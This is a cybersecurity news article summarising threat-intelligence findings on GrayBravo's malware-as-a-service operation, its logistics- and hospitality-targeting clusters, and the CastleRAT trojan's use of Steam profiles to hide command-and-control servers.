GrayBravo MaaS Deploys CastleRAT Backdoor, Hiding C2 with Steam Profile Dead Drop Resolvers

A sprawling cybercriminal ecosystem continues to expand its reach, launching sophisticated attacks against the global logistics and hospitality sectors. A new threat analysis from Insikt Group (Recorded Future) reveals the rapid evolution of GrayBravo (formerly TAG-150), a threat actor operating a potent Malware-as-a-Service (MaaS) network that empowers distinct criminal clusters with advanced tools like CastleLoader and the newly discovered CastleRAT.

GrayBravo is not acting alone. Instead, it appears to be the architect behind a tiered criminal enterprise. The report identifies four distinct “activity clusters” utilizing GrayBravo’s tooling, each with unique targets and tactics. This structure supports the assessment that the group “runs a malware-as-a-service ecosystem,” providing infrastructure and payloads to affiliates.

“GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure,” the researchers noted.

Cluster 1: Hijacking the Supply Chain

One of the most aggressive clusters, tracked as TAG-160, is laser-focused on the logistics industry. This group impersonates legitimate freight and logistics firms, such as England Logistics, to deceive carriers and drivers.

The attacks often begin with a “dpeforms” lure—fake document signing pages designed to look like legitimate freight rate confirmations. When victims attempt to “sign” the document, they are hit with a “ClickFix” attack: a deceptive pop-up instructing them to copy and paste a malicious PowerShell command to “verify” their identity.

“Cluster 1… impersonates logistics firms and uses both phishing and ClickFix techniques to deliver CastleLoader, spoofing emails and abusing freight-matching platforms,” the report states. By compromising accounts on platforms like DAT Freight & Analytics and Loadlink, the attackers insert themselves directly into the supply chain workflow.

Cluster 2: The Booking.com “Mailer”

A second cluster, TAG-161, has set its sights on the hospitality sector. This group utilizes specialized “Phishing Email Management Tooling”—custom web panels designed to manage mass email campaigns targeting Booking.com users .

These panels, with names like “Redirect and Email Manager,” allow attackers to automate the creation of redirect links and the distribution of phishing emails at scale. “The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels,” Insikt Group observes.

CastleRAT: Spyware with a Steam Disguise

At the heart of these operations is CastleRAT, a custom remote access trojan capable of stealing credentials, logging keystrokes, and capturing screens. The malware uses a clever evasion technique: Dead Drop Resolvers.

To hide its command-and-control (C2) servers, CastleRAT checks public Steam Community profiles (e.g., steamcommunity[.]com/id/autryjones) for encoded instructions. “The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware,” the report explains.

The “Sparja” Connection

The investigation also unearthed a potential link to a specific threat actor. Researchers connected the infrastructure to a user known as “Sparja” on the underground Exploit Forum.

“Analysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named ‘Sparja’,” the report reveals. This user was previously observed seeking to buy or rent custom droppers, aligning with the development timeline of CastleLoader.

Related Posts:

• Sophisticated CastleRAT Backdoor Uses Steam Community Pages as Covert C2 Resolver for Espionage
• New MaaS Operator TAG-150 Uses ClickFix Lure and Custom CastleLoader to Compromise 469 US Devices
• From CastleLoader to CastleRAT: TAG-150’s Multi-Tiered Cyber Arsenal Expands
• Russian GRU’s APT28 Targets Global Logistics Supporting Ukraine Defense